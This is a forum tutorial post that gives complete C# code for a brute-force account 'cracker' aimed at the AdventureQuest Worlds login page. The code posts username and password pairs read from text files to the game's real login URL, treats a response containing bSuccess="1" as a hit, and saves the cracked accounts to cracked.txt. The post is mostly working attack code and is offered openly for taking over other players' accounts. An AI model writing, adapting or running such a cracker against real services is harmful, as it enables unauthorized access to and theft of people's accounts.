[C#] Basic AQW Cracker

Heya, inspired by Jadens post I felt like it'd be a shame if I left you guys out on a C# cracker, but lets first explain the concept of a cracker.

What a cracker does, is alike imitating user input, it takes the data you give it and sends it using a POST request. Now what is a POST request? All of you have logged in to a site before, when you enter the information and submit the form, this form sends the POST Data to the file that handles it, in other words the login file. Now it's also possible to write this POST data directly to the file using another program which knows what data to send. When the response is received, the program checks if the login was valid (by looking for a certain word, such as "success", depending on the login of course.), and it then stores it for the user.

Quick tip: If you want to know what POST data is being send normally, and what is received, use something like TamperData in FireFox, or my preference, the Networking Tool in Chromium browsers. Now it's time to decide what site we want to crack, I'll be using AQWorlds in this example, as it doesn't use any encryption methods in the data and is fairly simple. +Most of you are addicted to it so yeah...

This example will be single-threaded although it's quite easy to multi-thread it, it will be reading and writing to and from text files.

What we are going to use for the cracking function is a Boolean method, it's not a real method, but a Boolean is a type of variable that will say either true or false, we will create a web request and then see if it's a succesful login, if it is we return true, else we return false.

AQWorlds takes 2 pieces of data, strUsername and strPassword.

Setting up the project:
- Open your C# IDE.
- Create a new Console application.
- Add these imports to the other imports (top of your code):

Code:

using System.Net;
using System.IO;]

These imports will allow use to create WebRequests, use StreamReaders to read the information from the WebRequests and text files, StreamWriters, etc.

This method will contain an extra few lines of code, unnecessary but handy, that will tell you all the information on the web request, so you can easily see what's going on, handy for debugging.

Cracking Method (Thanks to the MSDN Library for explaining the POST stuff):

Code:

public static Boolean crack(string username, string password)
        {
            string result = null; //This will hold the result from the webpage.
            try //We try to create the request, if not it will throw an exception
            {

                byte[] buffer = Encoding.ASCII.GetBytes("strUsername=" + username + "&strPassword=" + password); //This will hold the information bytes of the POST data
                HttpWebRequest CrackRequest = (HttpWebRequest)WebRequest.Create("http://game.aqworlds.com/game/cf-userlogin.asp"); //We create the request to the login file
                CrackRequest.Method = "POST"; //We define what type of METHOD the request is using, in this case POST, could also be GET for some other thing, but this is a posting method...
                CrackRequest.ContentType = "application/x-www-form-urlencoded"; //Setting the content type
                CrackRequest.ContentLength = buffer.Length; //Setting the content length
                Stream Post = CrackRequest.GetRequestStream(); //Creating the Stream we'll use to write the post data
                Post.Write(buffer, 0, buffer.Length); //Write the post data to the WebRequest
                Post.Close(); //Close the Post stream
                HttpWebResponse CrackResponse = (HttpWebResponse)CrackRequest.GetResponse(); //Get the response

                //This is part of the debug code
                Console.WriteLine(CrackResponse.StatusCode); //Show the Status Code for debugging
                Console.WriteLine(CrackResponse.Server); //Show the name of the server that send the response


                Stream data = CrackResponse.GetResponseStream(); //Get the response stream
                StreamReader datareader = new StreamReader(data); //Create a reader to read the data
                result = datareader.ReadToEnd(); //Read and store the stream data


                //Debug code
                Console.WriteLine("Response:" + result); //Show the response

            }
            catch (Exception ex)
            {
                Console.WriteLine(ex); //Something happened :\
            }

            Boolean cracked = false; //Setting the boolean to false

            if (result.Contains("bSuccess=\"1\"")) //The response contained bSuccess="1", meaning it was successful
            {
                cracked = true; //Set the boolean to true, meaning it's cracked
            }

            return cracked; //Ermahgerd it's cracked

        }

Now that that's done, we can create the code that will loop through the usernames and passwords in the text files, but before we do that we have to create a writing function with which we store the cracked accounts in cracked.txt.

Code:

   public static void write(String path, String line)
        {
        Retry: //In case it was already in use or something we keep trying it again
            try
            {
                using (StreamWriter sw = File.AppendText(path))
                {
                    sw.WriteLine(line); //Write the data
                    sw.Close(); //Close the streamwriter
                }
                

            }
            catch (IOException)
            {
                goto Retry; //Something went wrong, retry.
            }


        }

Now the real cracking and we're done

Code:

String path = Directory.GetCurrentDirectory() + "\\".ToString(); //Path of program, needed to write to the files
            int acracked = 0; //The amount we cracked
            int atries = 0; //The amount of tries
            string username; //The string that holds the username
            string pass; //The string that holds the password

            // Read the usernames and crack them with the given usernames and password
            StreamReader usernames = new StreamReader(path + "usernames.txt"); //The streamreader to read the usernames.txt file
            while ((username = usernames.ReadLine()) != null) //Looping through all the username
            {

                Console.WriteLine("[" + atries + "][" + acracked + "] Cracking: " + username); //Show what username we are currently cracking


                StreamReader passwords = new StreamReader(path + "passwords.txt"); //The streamreader to read all the passwords
                while ((pass = passwords.ReadLine()) != null) //Looping through all the passes
                {

                    Boolean cracked = crack(username, pass); //The crack method we made, entering the username and password of this try and receiving if it's true or false

                    if (cracked) //It's true, we cracked it, using the write method we created earlier we store it in cracked.txt
                    {
                        Console.WriteLine("[CRACKED] " + username + ":" + pass); //Show we cracked it
                        write(path + "cracked.txt", username + ":" + pass); //Write it to the text file
                        acracked++; //Increase the amount of cracked by one
                        goto alreadydone; //It's already done, no need to loop through the other passwords.
                    }
                    else //It failed...
                    {
                        Console.WriteLine("[FAIL] " + username + ":" + pass);
                    }

                }
                alreadydone: //It was already cracked, we go here
                passwords.Close();
                atries++; //Increase the amount of tries

            }
            usernames.Close();

            Console.WriteLine("Done cracking, cracked a total of " + acracked);      
 

Happy cracking, hope you liked the tut, someone requested me to make one a while ago and then I saw Jadens and was like, oh yeah